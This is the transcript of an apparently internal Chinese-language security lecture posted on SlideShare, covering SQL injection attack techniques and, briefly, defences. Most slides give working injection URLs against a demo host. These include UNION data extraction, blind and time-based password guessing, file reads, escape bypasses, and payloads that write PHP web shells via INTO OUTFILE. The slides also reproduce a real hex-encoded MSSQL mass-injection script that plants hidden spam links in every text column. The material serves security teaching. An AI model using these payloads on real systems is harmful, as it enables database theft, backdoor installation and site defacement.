Your SlideShare is downloading. ×
伺服器端攻擊與防禦I
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

伺服器端攻擊與防禦I

3,463
views

Published on

用戶端攻擊與防禦 …

用戶端攻擊與防禦
Hiiir - Taien 內部資安講座
1020307
Taien Wang


0 Comments
6 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
3,463
On Slideshare
0
From Embeds
0
Number of Embeds
6
Actions
Shares
0
Downloads
58
Comments
0
Likes
6
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Taien內部資安講座 IV 伺服器端攻擊與防禦I 2013.03.07 @ Hiiir Inc. Taien Wang<taien_wang@hiiir.com> 英屬維京群島商時間軸科技股份有限公司新創事業部
  • 2. 1020307 伺服器端攻擊與防禦I - 大綱 • SQL Injection – 攻擊技巧 • 判斷是否有弱點 • 常用函數 • UNION • 繞過跳脫字元 – ASCII編碼 – 16進位 – 雙位元組跳脫技巧 – SQL Blind Injection • Time-Based Blind SQL Injection – SQL Column Truncation
  • 3. SQL Injection – 簡介 • Rfp, “NT Web Technology Vulnerabilities”, Phrack, 1998 • 維京百科 – SQL攻擊(SQL injection,中國大陸稱作SQL注入攻擊),簡稱隱碼 攻擊,是發生於應用程式之資料庫層的安全漏洞。簡而言之,是在輸入 的字串之中夾帶SQL指令,在設計不良的程式當中忽略了檢查,那麼這 些夾帶進去的指令就會被資料庫伺服器誤認為是正常的SQL指令而執行, 因此遭到破壞。
  • 4. SQL Injection - 範例資料庫的資料
  • 5. SQL Injection - 請試想這段程式碼有什麼問題
  • 6. SQL Injection攻擊技巧 – 簡易嘗試是否有弱點 • http://www.hackdemo.com/getUser.php?id=1 • http://www.hackdemo.com/getUser.php?id= • http://www.hackdemo.com/getUser.php?id=999999.9 • http://www.hackdemo.com/getUser.php?id=1' • http://www.hackdemo.com/getUser.php?id=1+and+1=1 • http://www.hackdemo.com/getUser.php?id=1+and+1=2
  • 7. SQL Injection攻擊技巧 – 空格與註解 • 關鍵字大小寫混雜 • 註解  #(%23), /*, -- • 空格  +, /**/ URL編碼 用途 %09 horizontal tab %0a line feed %0b vertical tab %0c form feed %0d carriage return %20 space
  • 8. SQL Injection攻擊技巧 - 猜解資料常用函數 函數 功能 LENGTH(str) 返回字串長度 LEFT(str,len) 返回某字串開頭開始的len最左字串 RIGHT(str,len) 返回某字串開頭開始的len最右字串 SUBSTRING(str,pos,len) 取得某字串的子字串 SUBSTR(str,pos,len) 為SUBSTRING同義詞 MID(str,pos,len) 為SUBSTRING同義詞 CHAR(N,... [USING charset]) 其返回值為一個包含這些整數代碼值的字串 HEX(N_or_S) 如果N或S是一個數字,則返回16進位N的字串 ASCII(str) 返回值為字串str的最左邊數值 CONCAT(str1,str2,...) 返回值為所有連接參數產生的字串 NAME_CONST(name,value) 返回一個定值。當月來產生一個結果集合列時, NAME_CONST()促使該列使用定義名稱 5.1後限制僅能使用CONST的變數 …
  • 9. SQL Injection攻擊技巧 - 相關系統函數 函數 功能 LOAD_FILE(file_name) 讀取檔案 INTO OUTFILE '/var/www/html/back.php' 輸出檔案 VERSION() 返回MySQL伺服器版本 DATABASE() 目前使用資料庫名稱 USER() 返回目前MySQL用戶與主機名稱 SYSTEM_USER() 與USER()同義 SESSION_USER() 與USER()同義 SCHEMA() 與DATABASE()同義 CURRENT_USER() 返回當前被驗證的用戶名與主機名組合,可能與 USER()值有所不同 @@DATADIR 讀取資料庫路徑 @@BASEDIR 資料庫安裝路徑 …
  • 10. SQL Injection攻擊技巧 – 讀檔注意事項 • 欲讀取文件必須在伺服器上 • 必須指定文件完整的路徑 • 必須有權限讀取並且文件必須完全可讀 • 欲讀取文件必須小於 max_allowed_packet
  • 11. SQL Injection攻擊技巧 – UNION • PHP+MySQL未支援多指令查詢,利用聯集查詢UNION – 有弱點的SQL語法,沒有引號的參數(以PHP為例) • SELECT * FROM `member` WHERE `id` =$id – 沒有引號攻擊範例 • http://www.hackdemo.com/getUser.php?id=1+and+1=2+UNI ON+SELECT+1,2,3,4# – 實際執行語法 • SELECT * FROM `member` WHERE `id` =1 AND 1=2 UNION SELECT 1,2,3,4#
  • 12. SQL Injection攻擊技巧 – UNION • PHP+MySQL未支援多指令查詢,利用聯集查詢UNION • 有弱點的SQL語法,有引號的參數(以PHP為例) • SELECT * FROM `member` WHERE `name` like '" . $name . "%' • 沒有引號攻擊範例 • http://www.hackdemo.com/searchUser.php?name=h%'/**/a nd/**/1=2/**/union/**/select/**/1,2,3,user()%23 • 實際執行語法 • SELECT * FROM `member` WHERE `name` like 'h%'/**/and/**/1=2/**/union/**/select/**/1,2,3,user()#%'
  • 13. SQL Injection攻擊技巧 - 成功控制語法
  • 14. SQL Injection攻擊技巧 – 猜解資料 • 取得長度 – http://www.hackdemo.com/getUser.php?id=1+AND+LENGTH(PA SSWORD)=1# – … – http://www.hackdemo.com/getUser.php?id=1+AND+LENGTH(PA SSWORD)=7# • 猜解資料 – http://www.hackdemo.com/getUser.php?id=1+AND+RIGHT(PAS SWORD,1)='a'# – … – http://www.hackdemo.com/getUser.php?id=1+AND+RIGHT(PAS SWORD,1)='w'#
  • 15. SQL Injection攻擊技巧 – 讀寫檔案 • 讀資料寫檔案 – http://www.hackdemo.com/getUser.php?id=1+into+outfile+'D:/W ebsite/www.hackdemo.com/member.txt' • 寫後門 – http://www.hackdemo.com/getUser.php?id=1+AND+1=2+UNIO N+SELECT+%22%3C?php+system($_GET['cmd']);?%3E%22,2,3,4+i nto+outfile+'D:/Website/www.hackdemo.com/cmd.php'
  • 16. 加上跳脫與關閉錯誤訊息,這樣安全了嗎?
  • 17. SQL Blind Injection • SQL盲注入(SQL Blind Injection),也是一種SQL Injection的類型。一般 SQL Injection仰賴出錯的相關訊息建構攻擊語法,而盲注入完全仰賴語法 執行的對(true)錯(false) • SQL Blind Injection – 一般盲注入 – Time-Based Blind SQL Injection
  • 18. Time-Based Blind SQL Injection (1/2) • 透過時間的延遲來判斷該SQL語法是否執行成功 • 技巧 – 內建函數 • BENCHMARK(COUNT, EXPR) • SLEEP(seconds) – MySQL >= 5 – 創建較花時間的語法(heavy queries)
  • 19. Time-Based Blind SQL Injection - 使用 heavy queries (2/2)
  • 20. Time-Based Blind SQL Injection - 透過時間 延遲猜解資料庫名稱 • http://www.hackdemo.com/getUserLash.php?id=1+UNION+SEL ECT+IF(SUBSTRING(db,1,1)=CHAR(1),BENCHMARK(5000000,E NCODE('ENCODE','5s')),NULL),2,3,4+FROM+(SELECT+DATABAS E()+as+db)+AS+tb • … • http://www.hackdemo.com/getUserLash.php?id=1+UNION+SEL ECT+IF(SUBSTRING(db,1,1)=CHAR(104),BENCHMARK(5000000, ENCODE('ENCODE','5s')),NULL),2,3,4+FROM+(SELECT+DATABA SE()+as+db)+AS+tb
  • 21. SQL Injection攻擊技巧 - 繞過跳脫字元 • ACSII編碼 – ASCII(), CHAR() – 單一 • CHAR(68) – 多個 • CHAR(68, 58, 92) • 16進位編碼 – HEX() – 0x443A5C • 雙位元組跳脫技巧
  • 22. SQL Injection攻擊技巧 - 猜解資料(繞過跳脫) • 猜解欄位 – http://www.hackdemo.com/getUser.php?id=1+AND+1=2+UNIO N+SELECT+1,2,3,4+FROM+user-- – http://www.hackdemo.com/getUser.php?id=1+AND+1=2+UNIO N+SELECT+1,2,3,4+FROM+member-- • 猜解欄位資料 – http://www.hackdemo.com/getUserLash.php?id=1+AND+RIGHT (PASSWORD,1)=char(0) – … – http://www.hackdemo.com/getUserLash.php?id=1+AND+RIGHT (PASSWORD,1)=char(119)
  • 23. SQL Injection攻擊技巧 - 讀取資料(繞過跳脫) • 讀資料寫檔案 – http://www.hackdemo.com/getUserLash.php?id=1+AND+1= 2+UNION+SELECT+1,2,3,load_file(char(68,58,92,87,101,98, 115,105,116,101,92,119,119,119,46,104,97,99,107,100,101 ,109,111,46,99,111,109,92,103,101,116,85,115,101,114,46 ,112,104,112))-- – http://www.hackdemo.com/getUserLash.php?id=1+AND+1= 2+UNION+SELECT+1,2,3,load_file(0x443A5C576562736974 655C7777772E6861636B64656D6F2E636F6D5C636F6E6669 672E706870)--
  • 24. SQL Injection攻擊技巧 – 寫檔案(無法繞過引號 限制) 1. 找到phpMyAdmin 2. 遠端MySQL mysql> use xssdb; mysql> set @a=0x73656C656374203078334333463730363837303230343036353736363136433238323 435463530344635333534354232373633364436343237354432393342334633452066726F6D 20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70 687027; mysql> prepare cmd from @a; mysql> execute cmd; @a為 select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from xss limit 1 into outfile 'C:/shell.php'; 寫入檔案為 <?php @eval($_POST['cmd']);?>
  • 25. SQL Injection攻擊技巧 - 雙位元組跳脫技巧 (1/3) • 透過注入的編碼與反斜線/(%5c)重組產生:字',繞過跳脫字元的限制 • 情境 – 跳脫字元處理 • addslashes • mysql_escape_string • php.in – magic_quotes_gpc 開啟 – 採用BIG5或GBK編碼 • set names gbk, set names big5
  • 26. SQL Injection攻擊技巧 - 雙位元組跳脫技巧 (2/3) • 中文語系文字以兩個位元組表示 – Big5: • 高位元組: 0x81-0xFE;低位元組: 0x40-0x7E、0xA1-0xFE – GBK : • 前位元組: 0x81-0xFE;後位元組: 0x40-0x7E – GB2312: • 前位元組: 0xB0-0xF7;後位元組: 0xA0-0xFE – 攻擊字元: %BF, %CC, %D5…
  • 27. SQL Injection攻擊技巧 -雙位元組跳脫技巧 (3/3) • 有引號的參數繞過跳脫 – http://www.hackdemo.com/searchUserLash.php?name=h% %B5'+AND+1=2+UNION+SELECT+1,2,3,4%23 – http://www.hackdemo.com/searchUserLash.php?name=h% %CC'+AND+1=2+UNION+SELECT+1,2,3,4%23 – http://www.hackdemo.com/searchUserLash.php?name=h% %d5'+AND+1=2+UNION+SELECT+1,2,3,4%23
  • 28. SQL Column Truncation – 簡介(1/3) • MySQL中 SQL mode – 沒有開啟 STRICT_ALL_TABLES • 使用者新增超過長度的資料會出現警告提示 • 但資料還是會新增 – 開啟 STRICT_ALL_TABLES • 使用者新增超過長度的資料會出現提示 • 出現ERROR 1406, 該資料不會成功新增 • 慘案 – 2008-09-07 • WordPress 2.6.1 SQL Column Truncation Vulnerability
  • 29. SQL Column Truncation - 效果(2/3)
  • 30. SQL Column Truncation - 防禦方案(3/3) • 在字串中不該有空白的主動清除 – 如帳號類資訊 • 在 SELECT 資料時加上 BINARY 參數 • 在 MySQL 設定預設以 BINARY 查詢 • 在 MySQL 開啟 STRICT_ALL_TABLES – 超過欄位長度會出現 ERROR 而非出現 WARNING – 新增資料為避免發生錯誤, 可能需在新增修改加入額外檢查
  • 31. SQL Injection – 延伸思考 • INSERT 與 UPDATE 的攻擊可能發生嗎? • NoSQL 沒有 SQL Injection? • 其他攻擊利用 – Deep Blind Injection – Error-Based Injection • Duplicate Error • Function – information_schema – 使用者自訂函數(User-Defined Functions) – 觸發(Trigger)
  • 32. SQL Injection – 自動化工具 • Havij • Pangolin • w3af • Jsky • SQLmap • …
  • 33. 正確地防禦SQL Injection • 最低權限原則 • 使用預先編譯敘述 • 使用預存函數 • 使用UTF8避免使用BIG5或GBK • 檢查資料型態與強制轉型 – bool settype(mixed &$var, string $type) – intval, doubleval... • 使用安全函數 – OWASP ESAPI • MySQLCodec
  • 34. MSSQL實際案例 - 116jurist.ru自動化注入(1/4) • 2012.12.xx 10:03:31 • Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x73657420616e73695f7761726e696e6773206f66 66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204 445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142 4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4 12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865 726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74 657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448 3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162 6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434 8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040 46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275 d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249 4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b 40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652 4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43 7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(@s)--
  • 35. MSSQL實際案例 - 116jurist.ru自動化注入(2/4) • 2012.12.xx 10:03:33 • Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x73657420616e73695f7761726e696e6773206f66 66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204 445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142 4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4 12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865 726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74 657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448 3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162 6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434 8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040 46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272 b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920 4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544 f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616 26c655f437572736f72+as+varchar(8000))+exec(@s)--
  • 36. MSSQL實際案例 - 116jurist.ru自動化注入(3/4) • 2012.12.xx 10:03:44 • Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x73657420616e73695f7761726e696e6773206f66 66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204 445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142 4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4 12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865 726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74 657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448 3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162 6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434 8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040 46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275 d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b 275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746 53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e 3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275 203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455 44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c 4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc har(8000))+exec(@s)--
  • 37. MSSQL實際案例 - 116jurist.ru自動化注入解碼 (4/4) • set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=SUBSTRING(['+@C+'], 1, CHARINDEX(''</title><'',['+@C+']) - 1) where ['+@C+'] like ''%</title><%'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor • • set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>20 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('ALTER TABLE ['+@T+'] ALTER COLUMN ['+@C+'] varchar(8000) NOT NULL') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor • • set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>80 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=CONVERT(VARCHAR(8000),['+@C+'])+''</title><style>.a4tw{position:absolute;clip:rect(457px,auto,auto,457px);}< /style><div class=a4tw><a href=http://116jurist.ru>þðèäè÷åñêèå-óñëóãè-ìîñêâà</a></div>'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
  • 38. 參考資料 • 吳翰清, 網路竟然這麼危險(白帽子讲Web安全), 2012 • MySQL, String Functions, 5.1 • MySQL, Miscellaneous Functions, 5.1 • MySQL/PHP 对单引号转义时load_file/outfile 生成一句话 • Shazin Sadakath, Time Based SQL Injection using heavy queries in MySQL • Stefan Esser, MySQL and SQL Column Truncation Vulnerabilities, 2008

×